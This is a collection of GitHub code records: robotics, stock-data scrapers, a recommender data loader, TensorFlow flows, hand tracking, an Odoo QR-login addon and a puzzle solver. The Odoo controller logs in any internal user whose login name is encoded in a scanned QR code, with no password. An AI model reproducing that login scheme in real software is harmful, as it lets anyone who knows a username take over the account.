[10,11,12,13,14,15]]\n\n\n print(location[0])\n print(location[1])\n\n for servos_move in translate(location[0],location[1]):\n print(servos_move)\n\n","repo_name":"jerrycan321/robotarm1","sub_path":"translate.py","file_name":"translate.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4855550906","text":"from Application.Services.WriteData.WriteOfflineData.WriteOfflineDataStockService import get_prices_data\nfrom TelegramProject.Filters.FilterParent import *\n\nclass optionFilter(filterParent):\n\n def __init__(self, dh) -> None:\n super().__init__(dh)\n self.reportTime = 0\n\n def run_filter(self):\n\n now = get_now_time(timeShift)\n\n if END_TIME_1+MIN < now.inSeconds < END_TIME_1+10*MIN and now.weekday not in [THURSDAY, FRIDAY]:\n\n msg = self.create_report()\n if self.reportTime == 0:\n for _ in range(5):\n if send_message(dataArchiveChatID, msg):\n self.reportTime = now.inSeconds\n break\n\n def create_report(self):\n \n volumeFilter = '✅#حجم_آپشن✅:\\n\\n'\n\n for ID in self.dataHandler.presentData:\n\n if ID == 30556047326843168:\n x = 1\n\n try:\n tickerPresentData: presentData = self.dataHandler.presentData[ID]\n if tickerPresentData.Group in [311, 320] and tickerPresentData.Volume != 0:\n\n pricesData = get_prices_data(ID, 10)\n\n # pastVolume = tickerPresentData.Volume\n # for i in range(len(pricesData)):\n # pastVolume += pricesData[i]['Volume']\n\n # pastVolume /= (len(pricesData)+1)\n\n # if tickerPresentData.Volume > 2 * pastVolume:\n\n if len(pricesData) == 10:\n \n pastValue = 0\n for i in range(3):\n pastValue += pricesData[i]['Value']\n pastValue /= 3\n if pastValue > 1.5 * 10 ** 10:\n volumeFilter += '#' + tickerPresentData.TickerName + ' '\n else:\n\n pastValue = 0\n for i in range(5):\n pastValue += pricesData[i]['Value']\n pastValue /= 5\n if pastValue > 1.5 * 10 ** 10:\n volumeFilter += '#' + tickerPresentData.TickerName + ' '\n else:\n\n pastValue = 0\n for i in range(10):\n pastValue += pricesData[i]['Value']\n pastValue /= 10\n if pastValue > 1.5 * 10 ** 10:\n volumeFilter += '#' + tickerPresentData.TickerName + ' '\n \n except:\n # print_error('ichimoko ' + str(ID))\n pass\n\n msg = volumeFilter + '\\n\\n' + get_time_in_persian(timeShift)\n\n return msg\n\n","repo_name":"shakouri20/BoursePlus","sub_path":"TelegramProject/Filters/OptionFilter.py","file_name":"OptionFilter.py","file_ext":"py","file_size_in_byte":2870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25415403736","text":"'''\r\nCreated on Aug 8, 2016\r\nProcessing datasets. \r\n\r\n@author: Xiangnan He (xiangnanhe@gmail.com)\r\n'''\r\nimport scipy.sparse as sp\r\nimport numpy as np\r\nimport pdb\r\nimport re\r\n\r\nclass Dataset(object):\r\n '''\r\n classdocs\r\n '''\r\n\r\n def __init__(self, path):\r\n '''\r\n Constructor\r\n '''\r\n self.trainMatrix = self.load_rating_file_as_matrix(path + \".train.rating\")\r\n self.validNegatives, validUserList = self.load_negative_file(path + \".valid.all\")\r\n self.validRatings = self.load_rating_file_as_list(path + \".valid.rating\", validUserList) \r\n self.testNegatives, testUserList = self.load_negative_file(path + \".test.all\")\r\n self.testRatings = self.load_rating_file_as_list(path + \".test.rating\", testUserList) \r\n\r\n assert len(self.testRatings[0]) == len(self.testNegatives)\r\n assert len(self.validRatings[0]) == len(self.validNegatives) \r\n \r\n self.num_users, self.num_items = self.trainMatrix.shape \r\n #self.allUnobserve = self.load_negative_file(path + \".all.unobserve\", list(range(self.num_users)))\r\n #pdb.set_trace()\r\n #self.testNegativesPPI = self.load_negative_file_ppi()\r\n \r\n def load_rating_file_as_matrix_ppi(self):\r\n Y = pd.read_csv('Y.csv', header=None)\r\n print(Y.shape)\r\n mat = sp.dok_matrix(Y, dtype=np.float32) \r\n return mat\r\n\r\n \"\"\"\r\n def load_rating_file_as_list(self, filename):\r\n ratingList = []\r\n with open(filename, \"r\") as f:\r\n line = f.readline()\r\n while line != None and line != \"\":\r\n arr = line.split(\"\\t\")\r\n user, item = int(arr[0]), int(arr[1])\r\n ratingList.append([user, item])\r\n line = f.readline()\r\n return ratingList\r\n \"\"\"\r\n def load_rating_file_as_list(self, filename, testUserList):\r\n ratingList = []\r\n current_user = testUserList[0]\r\n items = []\r\n with open(filename, \"r\") as f:\r\n line = f.readline()\r\n while line != None and line != \"\":\r\n arr = line.split(\"\\t\")\r\n user, item = int(arr[0]), int(arr[1])\r\n while testUserList[0] < user: # the user with only negative test samples\r\n #pdb.set_trace()\r\n tmp_user = testUserList.pop(0) # remove the first user \r\n ratingList.append([tmp_user, items]) \r\n items = [] \r\n current_user = tmp_user\r\n \r\n items.append(item)\r\n line = f.readline()\r\n\r\n ratingList.append([current_user, items])\r\n tmp_user = testUserList.pop(0)\r\n items = [] \r\n\r\n while len(testUserList) > 0: # the user with only negative test samples\r\n tmp_user = testUserList.pop(0) # remove the first user \r\n ratingList.append([tmp_user, items]) \r\n\r\n return ratingList, testUserList\r\n \r\n def load_negative_file(self, filename):\r\n negativeList = []\r\n testUserList = []\r\n count = 0\r\n with open(filename, \"r\") as f:\r\n line = f.readline()\r\n while line != None and line != \"\":\r\n arr = line.split(\"\\t\")\r\n user = int(re.split(',|\\(| |\\)|', arr[0])[1]) \r\n if len(arr) > 1:\r\n testUserList.append(user)\r\n count = count + 1\r\n negatives = []\r\n for x in arr[1: ]:\r\n negatives.append(int(x))\r\n negativeList.append(negatives)\r\n line = f.readline()\r\n return negativeList, testUserList\r\n \r\n def load_rating_file_as_matrix(self, filename):\r\n '''\r\n Read .rating file and Return dok matrix.\r\n The first line of .rating file is: num_users\\t num_items\r\n '''\r\n # Get number of users and items\r\n num_users, num_items = 0, 0\r\n with open(filename, \"r\") as f:\r\n line = f.readline()\r\n while line != None and line != \"\":\r\n arr = line.split(\"\\t\")\r\n u, i = int(arr[0]), int(arr[1])\r\n num_users = max(num_users, u)\r\n num_items = max(num_items, i)\r\n line = f.readline()\r\n # Construct matrix\r\n mat = sp.dok_matrix((num_users+1, num_items+1), dtype=np.float32)\r\n with open(filename, \"r\") as f:\r\n line = f.readline()\r\n while line != None and line != \"\":\r\n arr = line.split(\"\\t\")\r\n user, item, rating = int(arr[0]), int(arr[1]), float(arr[2])\r\n if (rating > 0):\r\n mat[user, item] = 1.0\r\n line = f.readline() \r\n return mat\r\n\r\n\r\n","repo_name":"Hutchinson-Lab/Poisson-N-mixture","sub_path":"NeuralCF/Dataset.py","file_name":"Dataset.py","file_ext":"py","file_size_in_byte":4939,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"11378924555","text":"import pandas as pd\nimport parmap\nimport sqlite3\nfrom datetime import datetime\nfrom tqdm import tqdm\nimport multiprocessing\n\nnum_cores = multiprocessing.cpu_count()\n\ndef get_frgn(code):\n now = datetime.now()\n\n try:\n path = \"./temp/\" + str(code) + \".db\"\n con = sqlite3.connect(path)\n frgn1 = pd.read_sql(\"SELECT * FROM frgn\", con).sort_values(['날짜'], ascending=False)\n frgn1 = frgn1.drop_duplicates(['날짜'], keep='first')\n # frgn1 = frgn1.set_index(['날짜'])\n\n last_dt = datetime.strptime(frgn1['날짜'].iloc[0], \"%Y.%m.%d\").date()\n time_delta = (now.date() - last_dt).days\n\n if time_delta <= 6 :\n pages = 3\n\n else:\n pages = 30\n\n #새 데이터 불러오기 (조금만)\n frgn2 = pd.DataFrame()\n for page in range(1, pages):\n url_frgn = 'https://finance.naver.com/item/frgn.nhn?code=' + code\n pg_url = '{url}&page={page}'.format(url=url_frgn, page=page)\n frgn = pd.read_html(pg_url, header=1, encoding='euc-kr')[2]\n frgn2 = frgn2.append(frgn).dropna()\n\n # frgn2 = frgn2.set_index(['날짜'])\n frgn2.rename(columns={'순매매량':'기관', '순매매량.1':'외국인', '보유주수':'외국인보유주수', '보유율':'외국인보유율'}, inplace = True)\n frgn2 = frgn2.sort_values(['날짜'], ascending=False)\n\n if frgn2['날짜'].iloc[0] == now.strftime(\"%Y.%m.%d\"):\n if now.hour < 19:\n frgn2 = frgn2[1:]\n frgn1 = frgn1.append(frgn2)\n frgn1 = frgn1.sort_values(['날짜'], ascending=False)\n frgn1 = frgn1.drop_duplicates(['날짜'], keep='first')\n frgn1 = frgn1.set_index(['날짜'])\n frgn1.to_sql('frgn', con, if_exists='replace')\n\n\n else:\n frgn1 = frgn1.append(frgn2)\n frgn1 = frgn1.sort_values(['날짜'], ascending=False)\n frgn1 = frgn1.drop_duplicates(['날짜'], keep='first')\n frgn1 = frgn1.set_index(['날짜'])\n frgn1.to_sql('frgn', con, if_exists='replace')\n\n\n else:\n frgn1 = frgn1.append(frgn2)\n frgn1 = frgn1.sort_values(['날짜'], ascending=False)\n frgn1 = frgn1.drop_duplicates(['날짜'], keep='first')\n frgn1 = frgn1.set_index(['날짜'])\n frgn1.to_sql('frgn', con, if_exists='replace')\n\n\n except:\n pages = 1000\n\n frgn1 = pd.DataFrame()\n\n for page in tqdm(range(1, pages), mininterval=1, desc=code):\n # for page in range(1, pages):\n\n # try:\n url_frgn = 'https://finance.naver.com/item/frgn.nhn?code=' + code\n pg_url = '{url}&page={page}'.format(url=url_frgn, page=page)\n frgn = pd.read_html(pg_url, header=1, encoding='euc-kr')[2]\n frgn1 = frgn1.append(frgn).dropna()\n\n frgn1 = frgn1.drop_duplicates(['날짜'], keep='first')\n frgn1 = frgn1.set_index(['날짜']).sort_index(ascending=False)\n frgn1.rename(columns={'순매매량':'기관', '순매매량.1':'외국인', '보유주수':'외국인보유주수', '보유율':'외국인보유율'}, inplace = True)\n\n if frgn1.index[0] == now.strftime(\"%Y.%m.%d\"): #조회 시도하는 날짜가 장중\n if now.hour < 19: #장 마감 전인가?? : 당일 시세 데이터 제외\n frgn1 = frgn1[1:]\n path = \"./temp/\" + str(code) + \".db\"\n con = sqlite3.connect(path)\n frgn1.to_sql('frgn', con, if_exists='replace')\n else: #장 마감 후 : 당일 시세 데이터 포함\n path = \"./temp/\" + str(code) + \".db\"\n con = sqlite3.connect(path)\n frgn1.to_sql('frgn', con, if_exists='replace')\n else: #조회 시도하는 날이 장중이 아닐때\n path = \"./temp/\" + str(code) + \".db\"\n con = sqlite3.connect(path)\n frgn1.to_sql('frgn', con, if_exists='replace')\n\ndef del_frgn(code):\n try:\n path = \"./temp/\" + str(code) + \".db\"\n con = sqlite3.connect(path)\n cursor = con.cursor()\n cursor.execute(\"drop table frgn\")\n\n except:\n pass\n\n\ndef trans_float(code):\n path = \"./temp/\" + str(code) + \".db\"\n con = sqlite3.connect(path)\n frgn1 = pd.read_sql(\"SELECT * FROM frgn\", con).sort_values(['날짜'], ascending=False)\n\n edit = lambda x:float(x.replace(\",\", \"\"))\n frgn1['기관'] = frgn1['기관'].apply(edit)\n\n print(frgn1)\n\n\n# get_frgn('095570')\n# del_frgn('095570')\ntrans_float('095570')\n\n\n# if __name__ == '__main__':\n#\n# codes = pd.read_excel('코드리스트2.xlsx', converters={'종목코드': str})\n# code = codes['종목코드']\n#\n# parmap.map(get_frgn, code, pm_pbar=True, pm_processes=num_cores)\n# # parmap.map(del_frgn, code, pm_pbar=True, pm_processes=num_cores)","repo_name":"Brown0801/get_stock","sub_path":"get_stock_frgn.py","file_name":"get_stock_frgn.py","file_ext":"py","file_size_in_byte":4933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71995778726","text":"import tensorflow as tf\n\nfrom tfsnippet.stochastic import StochasticTensor\nfrom tfsnippet.layers import BaseFlow\nfrom tfsnippet.utils import (validate_group_ndims_arg,\n get_default_scope_name,\n TensorWrapper,\n register_tensor_wrapper_class)\nfrom .base import Distribution\nfrom .utils import reduce_group_ndims\nfrom .wrapper import as_distribution\n\n__all__ = ['FlowDistributionDerivedTensor', 'FlowDistribution']\n\n\nclass FlowDistributionDerivedTensor(TensorWrapper):\n \"\"\"\n A combination of a :class:`FlowDistribution` derived tensor, and its\n original stochastic tensor from the base distribution.\n \"\"\"\n\n def __init__(self, tensor, flow_origin):\n \"\"\"\n Construct a new :class:`FlowDistributionDerivedTensor`.\n\n Args:\n tensor (tf.Tensor): The :class:`FlowDistribution` derived tensor.\n flow_origin (StochasticTensor): The original stochastic tensor\n from the base distribution.\n \"\"\"\n self._self_tensor = tensor\n self._self_flow_origin = flow_origin\n\n @property\n def flow_origin(self):\n \"\"\"\n Get the original stochastic tensor from the base distribution.\n\n Returns:\n StochasticTensor: The original stochastic tensor.\n \"\"\"\n return self._self_flow_origin\n\n @property\n def tensor(self):\n return self._self_tensor\n\n\nregister_tensor_wrapper_class(FlowDistributionDerivedTensor)\n\n\nclass FlowDistribution(Distribution):\n \"\"\"\n Transform a :class:`Distribution` by a :class:`BaseFlow`, as a new\n distribution.\n \"\"\"\n\n def __init__(self, distribution, flow):\n \"\"\"\n Construct a new :class:`FlowDistribution` from the given `distribution`.\n\n Args:\n distribution (Distribution): The distribution to transform from.\n It must be continuous,\n flow (BaseFlow): A normalizing flow to transform the `distribution`.\n \"\"\"\n if not isinstance(flow, BaseFlow):\n raise TypeError('`flow` is not an instance of `BaseFlow`: {!r}'.\n format(flow))\n distribution = as_distribution(distribution)\n if not distribution.is_continuous:\n raise ValueError('Distribution {!r} cannot be transformed by a '\n 'flow, because it is not continuous.'.\n format(distribution))\n if not distribution.dtype.is_floating:\n raise ValueError('Distribution {!r} cannot be transformed by a '\n 'flow, because its data type is not float.'.\n format(distribution))\n if distribution.value_ndims > flow.x_value_ndims:\n raise ValueError('Distribution {!r} cannot be transformed by flow '\n '{!r}, because distribution.value_ndims is larger '\n 'than flow.x_value_ndims.'.\n format(distribution, flow))\n\n self._flow = flow\n self._distribution = distribution\n\n tmp_distrib = distribution.expand_value_ndims(\n flow.x_value_ndims - distribution.value_ndims)\n super(FlowDistribution, self).__init__(\n dtype=distribution.dtype,\n is_continuous=distribution.is_continuous,\n is_reparameterized=distribution.is_reparameterized,\n batch_shape=tmp_distrib.batch_shape,\n batch_static_shape=tmp_distrib.get_batch_shape(),\n value_ndims=flow.y_value_ndims,\n )\n\n @property\n def flow(self):\n \"\"\"\n Get the transformation flow.\n\n Returns:\n BaseFlow: The transformation flow.\n \"\"\"\n return self._flow\n\n @property\n def base_distribution(self):\n \"\"\"\n Get the base distribution.\n\n Returns:\n Distribution: The base distribution to transform from.\n \"\"\"\n return self._distribution\n\n def sample(self, n_samples=None, group_ndims=0, is_reparameterized=None,\n compute_density=None, name=None):\n group_ndims = validate_group_ndims_arg(group_ndims)\n if not compute_density and compute_density is not None:\n raise RuntimeError('`FlowDistribution` requires `compute_prob` '\n 'not to be False.')\n\n with tf.name_scope(\n name, default_name='FlowDistribution.sample'):\n # x and log p(x)\n ndims_diff = (self.flow.x_value_ndims -\n self.base_distribution.value_ndims)\n x = self._distribution.sample(\n n_samples=n_samples,\n group_ndims=ndims_diff,\n is_reparameterized=is_reparameterized,\n compute_density=True\n )\n log_px = x.log_prob()\n\n # y, log |dy/dx|\n is_reparameterized = x.is_reparameterized\n y, log_det = self._flow.transform(x)\n if not is_reparameterized:\n y = tf.stop_gradient(y) # important!\n\n # compute log p(y) = log p(x) - log |dy/dx|\n # and then apply `group_ndims` on log p(y)\n log_py = reduce_group_ndims(\n tf.reduce_sum, log_px - log_det, group_ndims)\n\n # compose the transformed tensor\n return StochasticTensor(\n distribution=self,\n tensor=y,\n n_samples=n_samples,\n group_ndims=group_ndims,\n is_reparameterized=is_reparameterized,\n log_prob=FlowDistributionDerivedTensor(\n tensor=log_py,\n flow_origin=x\n ),\n flow_origin=x\n )\n\n def log_prob(self, given, group_ndims=0, name=None):\n given = tf.convert_to_tensor(given)\n with tf.name_scope(\n name,\n default_name='FlowDistribution.log_prob',\n values=[given]):\n # x, log |dx/dy|\n x, log_det = self._flow.inverse_transform(given)\n\n # log p(x)\n ndims_diff = (self.flow.x_value_ndims -\n self.base_distribution.value_ndims)\n log_px = self._distribution.log_prob(x, group_ndims=ndims_diff)\n\n # compute log p(y) = log p(x) + log |dx/dy|,\n # and then apply `group_ndims` on log p(x)\n log_py = reduce_group_ndims(\n tf.reduce_sum, log_px + log_det, group_ndims)\n\n return FlowDistributionDerivedTensor(\n tensor=log_py,\n flow_origin=StochasticTensor(\n distribution=self.base_distribution, tensor=x)\n )\n\n def prob(self, given, group_ndims=0, name=None):\n with tf.name_scope(\n name, default_name=get_default_scope_name('prob', self)):\n log_p = self.log_prob(given, group_ndims=group_ndims)\n p = tf.exp(log_p)\n return FlowDistributionDerivedTensor(\n tensor=p, flow_origin=log_p.flow_origin)\n","repo_name":"haowen-xu/tfsnippet","sub_path":"tfsnippet/distributions/flow.py","file_name":"flow.py","file_ext":"py","file_size_in_byte":7104,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"52"} +{"seq_id":"75190416483","text":"import re\nimport mediapipe as mp\nfrom contextlib import contextmanager\nfrom sailor.process.camera import np, cv2, Camera\n\n\nclass Tracker(Camera):\n def __init__(self):\n super().__init__()\n\n self.setup_default_model_settings()\n self.setup_hands()\n self.setup_default_display_settings()\n self.setup_default_landmark_values()\n self.setup_default_landmark_offset()\n self.setup_default_landmark_colors()\n\n def setup_default_model_settings(self, detec_con=0.7, track_con=0.7, model_complexity=0):\n self.detec_con = detec_con\n self.track_con = track_con\n self.model_complexity = model_complexity\n\n return self.detec_con, self.track_con, self.model_complexity\n\n def setup_hands(self):\n self.mp_drawing_utils = mp.solutions.drawing_utils\n self.mp_hands = mp.solutions.hands\n self.model_hands = self.mp_hands.Hands(False,\n 1,\n self.model_complexity,\n self.detec_con,\n self.track_con)\n\n def setup_default_display_settings(self):\n self.overlay_hands_landmarks = True\n self.overlay_hands_region = True\n self.overlay_hands_type_label = True\n self.overlay_hands_gesture_label = True\n\n return self.overlay_hands_landmarks, \\\n self.overlay_hands_region, \\\n self.overlay_hands_type_label, \\\n self.overlay_hands_gesture_label\n\n def set_overlay_hands_landmarks(self, overlay_value):\n self.overlay_hands_landmarks = overlay_value\n\n def set_overlay_hands_region(self, overlay_value):\n self.overlay_hands_region = overlay_value\n\n def set_overlay_hands_type(self, overlay_value):\n self.overlay_hands_type_label = overlay_value\n\n def set_overlay_hands_gesture(self, overlay_value):\n self.overlay_hands_gesture_label = overlay_value\n\n def setup_default_landmark_values(self):\n self.point_landmark_radius = 2\n self.point_landmark_thickness = 2\n self.line_landmark_radius = 2\n self.line_landmark_thickness = 2\n self.region_landmark_thickness = 2\n\n return self.point_landmark_radius, \\\n self.point_landmark_thickness, \\\n self.line_landmark_thickness, \\\n self.region_landmark_thickness\n\n def setup_default_landmark_offset(self):\n self.region_offset = 30\n self.labeled_hand_offset = 50\n\n def setup_default_landmark_colors(self):\n self.point_landmark_color = (46, 38, 35)\n self.line_landmark_color = (174, 204, 0)\n self.hand_type_label_color = (174, 204, 0)\n self.region_landmark_color = (174, 204, 0)\n\n def set_model_max_cur_listhands(self, max_cur_listhands_value):\n self.max_cur_listhands = max_cur_listhands_value\n self.setup_hands()\n\n def set_model_complexity(self, model_complexity_cur_listvalue):\n self.model_complexity = model_complexity_cur_listvalue\n self.setup_hands()\n\n def set_model_detec_con(self, detec_con_value):\n self.detec_con = detec_con_value\n self.setup_hands()\n\n def set_model_track_con(self, track_con_value):\n self.track_con = track_con_value\n self.setup_hands()\n\n def set_point_landmark_radius(self, radius_value):\n self.point_landmark_radius = radius_value\n\n def set_point_landmark_thickness(self, thickness_value):\n self.point_landmark_thickness = thickness_value\n\n def set_line_landmark_thickness(self, thickness_value):\n self.line_landmark_thickness = thickness_value\n\n def set_region_landmark_thickness(self, thickness_value):\n self.region_landmark_thickness = thickness_value\n\n # def set_point_landmark_color(self, point_color_rgb):\n # r = int(re.findall(\"[0-9]+\", point_color_rgb)[0])\n # g = int(re.findall(\"[0-9]+\", point_color_rgb)[1])\n # b = int(re.findall(\"[0-9]+\", point_color_rgb)[2])\n # self.point_landmark_color = b, g, r\n\n # def set_line_landmark_color(self, line_color_rgb):\n # r = int(re.findall(\"[0-9]+\", line_color_rgb)[0])\n # g = int(re.findall(\"[0-9]+\", line_color_rgb)[1])\n # b = int(re.findall(\"[0-9]+\", line_color_rgb)[2])\n # self.line_landmark_color = b, g, r\n\n # def set_hand_type_label_color(self, region_color_rgb):\n # r = int(re.findall(\"[0-9]+\", region_color_rgb)[0])\n # g = int(re.findall(\"[0-9]+\", region_color_rgb)[1])\n # b = int(re.findall(\"[0-9]+\", region_color_rgb)[2])\n # self.hand_type_label_color = b, g, r\n\n # def set_region_landmark_color(self, region_color_rgb):\n # r = int(re.findall(\"[0-9]+\", region_color_rgb)[0])\n # g = int(re.findall(\"[0-9]+\", region_color_rgb)[1])\n # b = int(re.findall(\"[0-9]+\", region_color_rgb)[2])\n # self.region_landmark_color = b, g, r\n\n @contextmanager\n def track_results(self, frame):\n frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n self.results = self.model_hands.process(frame_rgb)\n\n if self.results.multi_hand_landmarks:\n for self.hand_type, self.hand_landmark in zip(self.results.multi_handedness, self.results.multi_hand_landmarks):\n if self.overlay_hands_landmarks:\n self.mp_drawing_utils.draw_landmarks(\n frame,\n self.hand_landmark,\n self.mp_hands.HAND_CONNECTIONS,\n self.mp_drawing_utils.DrawingSpec(\n color=self.point_landmark_color,\n thickness=self.point_landmark_thickness,\n circle_radius=self.point_landmark_radius),\n self.mp_drawing_utils.DrawingSpec(\n color=self.line_landmark_color,\n thickness=self.line_landmark_thickness,\n circle_radius=self.line_landmark_radius))\n\n yield frame\n\n @contextmanager\n def track_hands(self, frame):\n with self.track_results(frame):\n self.h, self.w, _ = frame.shape\n\n self.landmarks_data = []\n\n x_cur_list = []\n y_cur_list = []\n\n labeled_hand = {}\n\n if self.results.multi_hand_landmarks:\n for self.hand_landmarks in self.results.multi_hand_landmarks:\n for i in range(len(self.hand_landmarks.landmark)):\n x = self.hand_landmarks.landmark[i].x\n y = self.hand_landmarks.landmark[i].y\n\n x_cur_list.append(x)\n y_cur_list.append(y)\n\n for i in range(len(self.hand_landmarks.landmark)):\n x = self.hand_landmarks.landmark[i].x\n y = self.hand_landmarks.landmark[i].y\n self.landmarks_data.append(x - min(x_cur_list))\n self.landmarks_data.append(y - min(y_cur_list))\n\n self.x_min = int(min(x_cur_list) * self.w)\n self.y_min = int(min(y_cur_list) * self.h)\n\n self.x_max = int(max(x_cur_list) * self.w)\n self.y_max = int(max(y_cur_list) * self.h)\n\n if self.overlay_hands_type_label:\n if not self.cap_flip:\n if self.hand_type.classification[0].label == \"Right\":\n labeled_hand[\"type\"] = \"Left\"\n else:\n labeled_hand[\"type\"] = \"Right\"\n\n else:\n labeled_hand[\"type\"] = self.hand_type.classification[0].label\n\n cv2.putText(frame,\n labeled_hand[\"type\"],\n (self.x_min - self.labeled_hand_offset,\n self.y_min - self.labeled_hand_offset),\n cv2.FONT_HERSHEY_PLAIN,\n 2,\n self.hand_type_label_color,\n 2)\n\n if self.overlay_hands_region:\n cv2.rectangle(frame,\n (self.x_min - self.region_offset,\n self.y_min - self.region_offset),\n (self.x_max + self.region_offset,\n self.y_max + self.region_offset),\n self.region_landmark_color,\n self.region_landmark_thickness)\n\n yield frame\n","repo_name":"jigolaka/screen-sailor-dp","sub_path":"sailor/process/tracker.py","file_name":"tracker.py","file_ext":"py","file_size_in_byte":8831,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"40469001417","text":"import cv2\nfrom pyzbar.pyzbar import decode\nfrom odoo.http import Controller, request\nfrom odoo import http\n\nSIGN_UP_REQUEST_PARAMS = {'db', 'login', 'debug', 'token', 'message', 'error',\n 'scope', 'mode',\n 'redirect', 'redirect_hostname', 'email', 'name',\n 'partner_id',\n 'password', 'confirm_password', 'city', 'country_id',\n 'lang', 'signup_email'}\n\n\nclass LoginController(Controller):\n \"\"\"controller that works when Login With QR clicked\"\"\"\n\n @http.route(['/web/redirect'], type='http', auth='none', website=True,\n csrf=False, csrf_token=None)\n def open_scanner(self, *args, **kw):\n \"\"\"This code scan the QR provided and Login to the corresponding user\n note: Only Internal User can login through it\"\"\"\n try:\n cap = cv2.VideoCapture(0)\n cap.set(3, 640)\n cap.set(4, 480)\n\n while True:\n ret, frame = cap.read()\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n for qr_code in decode(gray):\n (x, y, w, h) = qr_code.rect\n cv2.rectangle(frame, (x, y), (x + w, y + h),\n (0, 255, 0), 2)\n decoded_text = qr_code.data.decode(\"utf-8\")\n users = request.env['res.users'].search(\n [('share', '=', False)])\n login = users.mapped('login')\n if decoded_text in login:\n request.session.authenticate_without_passwd(\n request.session.db, decoded_text)\n cap.release()\n cv2.destroyAllWindows()\n return request.redirect('/')\n else:\n cap.release()\n cv2.destroyAllWindows()\n # Use the overridden web_login method to show error message\n values = {k: v for k, v in request.params.items() if\n k in SIGN_UP_REQUEST_PARAMS}\n\n values['error'] = (\"Wrong QR Code\")\n request.update_env(user=request.session.uid)\n request.env[\"ir.http\"]._auth_method_public()\n response = request.render('web.login', values)\n\n return response\n\n # Display the resulting frame\n cv2.imshow('scanner- to exit press \"q\"', frame)\n code = cv2.waitKey(1)\n\n if code == ord('q'):\n cap.release()\n cv2.destroyAllWindows()\n return request.redirect('/web/login')\n except Exception:\n return request.render(\"login_using_qr.be_patient\")\n\n","repo_name":"CybroOdoo/CybroAddons","sub_path":"login_using_qr/controllers/qr_scanner.py","file_name":"qr_scanner.py","file_ext":"py","file_size_in_byte":2913,"program_lang":"python","lang":"en","doc_type":"code","stars":204,"dataset":"github-code","pt":"52"} +{"seq_id":"6095917801","text":"from enum import Enum\nimport random\nimport copy\nfrom typing import List, Tuple\nimport math\n\n\nclass State(Enum):\n UNKNOWN = 0\n RED = 1\n BLUE = 2\n\n def __str__(self):\n if self.value == 0:\n return 'O'\n elif self.value == 1:\n return '\\U0001f7e5'\n else:\n return '\\U0001f7e6'\n\n def __repr__(self):\n return self.name\n\nclass ContradictionException(Exception):\n pass\n\nclass Grid:\n\n def __init__(self, row_clues: List[List[int]], col_clues: List[List[int]], grid = None):\n self.row_clues = row_clues\n self.col_clues = col_clues\n self.nRows = len(self.row_clues)\n self.nCols = len(self.col_clues)\n\n self.grid: List[List[State]] = [[State.UNKNOWN for y in range(self.nCols)] for x in range(self.nRows)] \\\n if grid is None else grid\n\n @staticmethod\n def from_puzzle_num(puzzle_num: int):\n row_file = f'rows_{puzzle_num}'\n col_file = f'cols_{puzzle_num}'\n row_clues = Grid.parse_clues(row_file)\n col_clues = Grid.parse_clues(col_file)\n\n return Grid(row_clues, col_clues)\n\n def __str__(self):\n return '\\n'.join(''.join(str(x) for x in row) for row in self.grid)\n\n def solve(self):\n dirty = True\n iteration = 0\n while dirty:\n dirty = False\n for row_num in range(self.nRows):\n new_row, new_dirty = self.solveRow(self.getRow(row_num), self.row_clues[row_num], fill_color=State.RED)\n if new_dirty:\n dirty = True\n self.setRow(row_num, new_row)\n\n for col_num in range(self.nCols):\n new_col, new_dirty = self.solveRow(self.getCol(col_num), self.col_clues[col_num], fill_color=State.BLUE)\n if new_dirty:\n dirty = True\n self.setCol(col_num, new_col)\n\n iteration += 1\n\n unknowns = self.get_unknown_coords()\n if unknowns:\n cached_grid = copy.deepcopy(self.grid)\n spec_row, spec_col = random.choice(unknowns)\n print(f'Speculating ({spec_row, spec_col} is RED')\n try:\n self.grid[spec_row][spec_col] = State.RED\n self.solve()\n except ContradictionException:\n self.grid = cached_grid\n try:\n print(f'Got contradiction! Try ({spec_row, spec_col} is BLUE')\n self.grid[spec_row][spec_col] = State.BLUE\n self.solve()\n except ContradictionException:\n self.grid = cached_grid\n print(f'({spec_row}, {spec_col}) is a contradiction. Back up.')\n raise\n\n\n def get_unknown_coords(self) -> List[Tuple[int, int]]:\n result = []\n for row_num, row in enumerate(self.grid):\n result += ((row_num, col_num) for col_num, col in enumerate(row) if col == State.UNKNOWN)\n return sorted(result, key=lambda x: self.dist(x, (self.nRows / 2, self.nCols / 2)), reverse=True)\n\n def getRow(self, row_num: int):\n return self.grid[row_num].copy()\n\n def setRow(self, row_num: int, new_row: List[State]):\n self.grid[row_num] = new_row\n\n def getCol(self, col_num):\n return [row[col_num] for row in self.grid]\n\n def setCol(self, col_num, new_col: List[State]):\n for i, x in enumerate(new_col):\n self.grid[i][col_num] = x\n\n def solveRow(self, row: List[State], clues: List[int], fill_color: State) -> Tuple[List[State], bool]:\n if not clues:\n return row, False\n\n x_color = State.RED if fill_color == State.BLUE else State.BLUE\n dirty = False\n\n def helper(clue_index):\n nonlocal row\n nonlocal dirty\n left = next(i for i, x in enumerate(row) if x != x_color)\n right = len(row) - next(i for i, x in enumerate(reversed(row)) if x != x_color)\n\n for clue in clues[:clue_index]:\n while any(x == x_color for x in row[left:left+clue]):\n left += 1\n left += clue + 1\n for clue in clues[-1:clue_index:-1]:\n while any(x == x_color for x in row[right - clue:right]):\n right -= 1\n right -= clue + 1\n\n\n clue = clues[clue_index]\n while any(x == x_color for x in row[left:left+clue]):\n if clue_index == 0:\n if row[left] == State.UNKNOWN:\n dirty = True\n row[left] = x_color\n elif row[left] == fill_color:\n raise ContradictionException\n left += 1\n while any(x == x_color for x in row[right - clue:right]):\n if clue_index == len(clues) - 1 and row[right-1] != x_color:\n if row[right-1] == State.UNKNOWN:\n dirty = True\n row[right - 1] = x_color\n elif row[right-1] == fill_color:\n raise ContradictionException\n right -= 1\n\n\n width = right - left\n if width < clue:\n raise ContradictionException('Contradiction!')\n if clue == width:\n if 